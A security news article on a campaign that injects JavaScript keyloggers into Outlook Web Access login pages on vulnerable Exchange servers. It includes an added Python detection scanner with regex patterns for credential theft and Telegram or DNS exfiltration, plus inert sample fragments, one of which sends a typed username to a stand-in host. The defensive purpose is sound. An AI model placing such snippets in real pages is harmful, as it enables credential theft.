Unidentified threat actors have been targeting publicly exposed Microsoft Exchange servers by injecting malicious JavaScript keyloggers into Outlook login pages to harvest user credentials, according to new research from Positive Technologies. The campaign has compromised 65 victims across 26 countries worldwide, representing a significant expansion of attacks first documented in May 2024 that initially focused on entities in Africa and the Middle East. The cybersecurity firm identified two distinct keylogger variants embedded in the authentication pages, with some storing collected data in locally accessible files while others immediately transmit stolen credentials to external servers controlled by the attackers.
The attack methodology exploits known vulnerabilities in Microsoft Exchange Server, including the ProxyShell and ProxyLogon vulnerability chains dating back to 2021, as well as older flaws such as CVE-2014-4078 and the Windows SMBv3 remote code execution vulnerability. The malicious JavaScript code intercepts authentication form data and either saves it to server files accessible from external networks or exfiltrates information through sophisticated channels including Telegram bots and DNS tunneling techniques. This approach provides attackers with a significant operational advantage as the locally stored variant generates no suspicious outbound traffic, making detection extremely difficult for security monitoring systems.
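As an added defender-side example (not code from the Positive Technologies research or this article), the following scan looks for the indicators described above in OWA authentication page assets: a form-submission hook paired with reads of credential fields, a server-side write to a local file, and Telegram- or DNS-style exfiltration. The regex patterns, the sample fragments and the Exchange path `%ExchangeInstallPath%FrontEnd\HttpProxy\owa\auth` are assumptions for illustration.

```python
import re
from pathlib import Path

# Heuristic indicators (constructed for this example) for injected credential
# capture in OWA login pages: a submit hook, a credential-field read, a local
# file write, and the exfiltration channels the report names (Telegram, DNS).
INDICATORS = {
    "submit_hook": re.compile(r"addEventListener\(\s*['\"]submit['\"]|\bonsubmit\s*=", re.I),
    "credential_read": re.compile(
        r"\b(password|passwd|pwd|username|logon)\w*\b.{0,60}\.value", re.I | re.S),
    "local_file_write": re.compile(r"File\.(Append|Write)All\w+\(|new\s+StreamWriter\(", re.I),
    "telegram_exfil": re.compile(r"api\.telegram\.org/bot", re.I),
    # Data concatenated into a hostname ('...' + x + '.domain') is a crude
    # DNS-tunneling heuristic and will need tuning against real pages.
    "dns_exfil": re.compile(r"['\"]\s*\+\s*\w+\s*\+\s*['\"]\.[a-z0-9.-]+", re.I),
}
EXFIL = {"local_file_write", "telegram_exfil", "dns_exfil"}

def scan_text(text):
    """Return the names of all indicators present in a page or script body."""
    return {name for name, rx in INDICATORS.items() if rx.search(text)}

def is_suspicious(text):
    """Flag a credential read that is paired with a submit hook or an exfil channel."""
    hits = scan_text(text)
    return "credential_read" in hits and bool(("submit_hook" in hits) or (hits & EXFIL))

def scan_dir(root):
    """Scan OWA auth assets on disk (assumed path: the FrontEnd\\HttpProxy\\owa\\auth
    directory under the Exchange install); returns {path: indicators} for flagged files."""
    flagged = {}
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix.lower() in {".aspx", ".js", ".htm", ".html"}:
            text = p.read_text(errors="ignore")
            if is_suspicious(text):
                flagged[str(p)] = sorted(scan_text(text))
    return flagged

# Constructed samples (not real injected code): a benign login-form fragment
# and two inert fragments that carry the indicators described in the report.
CLEAN = "<form id='logonForm' action='/owa/auth.owa' method='post'><input name='username'></form>"
TELEGRAM_SAMPLE = ("document.forms[0].addEventListener('submit', function(){ var p = "
                   "document.getElementById('password').value; /* ... api.telegram.org/bot<ID>/ ... */ });")
DNS_SAMPLE = ("var u = document.querySelector('#username').value; "
              "new Image().src = 'https://' + u + '.resolver.example/x.gif';")

if __name__ == "__main__":
    for label, sample in [("clean", CLEAN), ("telegram", TELEGRAM_SAMPLE), ("dns", DNS_SAMPLE)]:
        print(label, is_suspicious(sample), sorted(scan_text(sample)))
```

Treat a hit as a trigger to compare the file against a known-good copy and review the server for the web shells and Exchange exploitation artifacts mentioned above, since the locally stored variant leaves no outbound traffic to alert on.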
Government organizations are the primary targets, with 22 compromised servers identified, followed by IT companies, industrial organizations, and logistics firms. Geographically, Vietnam, Russia, Taiwan, China, Pakistan, Lebanon, Australia, Zambia, the Netherlands, and Turkey are among the most heavily targeted countries.